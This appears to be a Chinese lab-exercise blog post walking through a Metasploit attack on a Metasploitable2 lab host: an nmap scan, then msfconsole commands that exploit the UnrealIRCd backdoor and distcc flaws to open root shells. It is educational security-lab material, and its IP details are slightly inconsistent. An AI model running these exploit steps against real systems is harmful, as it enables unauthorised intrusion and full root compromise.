Metasploit攻击linux实例

一、实验目的
通过该实验了解Metasploit的基本框架,掌握metasploit攻击操作系统的一般方法
二、实验环境
在这里插入图片描述
漏洞主机:linux, IP 地址:10.1.1.136
攻击主机:Kali linux, IP地址:10.1.1.141

三、实验内容与实验要求
初步了解实验环境及漏洞信息搜集
利用UnrealIRCd后门漏洞攻击漏洞主机
利用Distcc后门漏洞攻击Metasploitable2漏洞主机
Distcc后门漏洞

四、实验过程与分析
查看Metasploitable2漏洞主机的登录用户及网络配置信息,从下图2可以看出漏洞主机登陆用户为msfadmin ,IP为192.168.220.136。使用命令如下:
whoami 查看当前登陆用户
ifconfig 查看网络配置信息
在这里插入图片描述
图2 查询漏洞主机信息
可以看出漏洞主机登陆用户为msfadmin ,IP为192.168.220.136。
查看攻击者主机登陆用户及网络配置信息,从下图3可以看出攻击主机登陆用户为root ,IP为192.168.220.141
whoami 查看当前登陆用户
ifconfig 查看网络配置信息
在这里插入图片描述
图3 查询攻击主机信息
扫描漏洞主机开放的端口,根据开放端口信息判断漏洞主机存在的安全问题。扫描结果如图4所示。执行Nmap对漏洞主机进行扫描,下述命令中各参数含义如下:-sT表示tcp端口扫描(完整三次握手),-v表示显示详细信息-v。使用命令:
利用口令: nmap -sT -v 192.168.220.136 扫描漏洞主机开发端口信息,扫描结果如下:
在这里插入图片描述
图4 扫描漏洞主机开发端口
实验步骤二
UnrealIRCd后门漏洞简介
安全组织索引
CVE:CVE-2010-2075
BID:BID-40820
OSVDB:OSVDB-65445
原理
在2009年11月到2010年6月间分布于某些镜面站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。
参考链接
http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt
影响系统/软件
Unreal UnrealIRCd 3.2.8.1
攻击步骤
分析可以利用的漏洞
Nmap扫描结果如图5所示,漏洞主机开启了大量的端口,也就意味着对外提供了大量的服务,增加了被攻击的风险。其中6667号端口开放IRC服务,可以利用UnrealIRCD IRC软件的漏洞来攻击漏洞主机。
在这里插入图片描述
图5 扫描漏洞主机开发端口对应协议
开启Msfconsole
运行“msfconsole”命令开启msf,图6为MSF启动后的初始化界面,从图中可以看出v4.8.2-2014010101版本Metasploit包括了1246个EXP,678个辅助模块,324个负载,32个编码器,8个无操作生成器。
在这里插入图片描述

搜索漏洞利用EXP
运行“search unrealircd”命令搜索关于UnrealIRCD漏洞的利用信息
在这里插入图片描述

运行漏洞利用EXP
运行“use exploit/unix/irc/unreal_ircd_3281_backdoor”命令开始运行EXP
在这里插入图片描述
使用’show options’ 命令查看该exploit的参数设置信息,发现执行该EXP前可以配置漏洞主机的IP和端口
在这里插入图片描述

设置漏洞主机IP
运行“set RHOST 192.168.220.136 ”命令设置漏洞主机IP
在这里插入图片描述

  附:该EXP默认端口为6667,与Metasploitable2漏洞主机开启IRC服务的端口一致,所以不用修改端口。

执行EXP
运行“exploit”命令,提示“Command shell session 1 opened (192.168.220.141:4444 -> 192.168.220.136:44972) at 2014-11-27 19:28:45 +0800”说明攻击成功,成功建立shell回话。
在这里插入图片描述

验证shell权限
运行linux系统命令“whoami”,回显“root”说明当前shell的权限是root权限,可进行任意操作而不受权限控制。
在这里插入图片描述

实验步骤三
安全组织索引
CVE:CVE-2004-2687
BID:无
OSVDB:OSVDB-13378
原理
Distcc用于大量代码在网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,该漏洞是XCode 1.5版本及其他版本的distcc 2.x版本配置对于服务器端口的访问不限制。
参考链接如下:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2004-2687
http://metasploit.com/modules/exploit/unix/misc/distcc_exec
影响系统/软件
distcc 2.x
利用步骤
在kali中执行“msfconsole”命令,启动metasploit
在这里插入图片描述
运行命令:“ use exploit/unix/misc/distcc_exec”选择漏洞利用EXP
在这里插入图片描述
运行命令:“set RHOST 192.168.220.136”,设置漏洞主机的IP
在这里插入图片描述
运行命令:“exploit”,开始攻击,出现“Command shell session 1 opened (192.168.220.141:4444 -> 192.168.220.136:58669) at 2014-11-27 20:00:27 +0800”说明shell建立成功
在这里插入图片描述
运行命令:“whoami”验证创立的shell的权限
在这里插入图片描述

评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值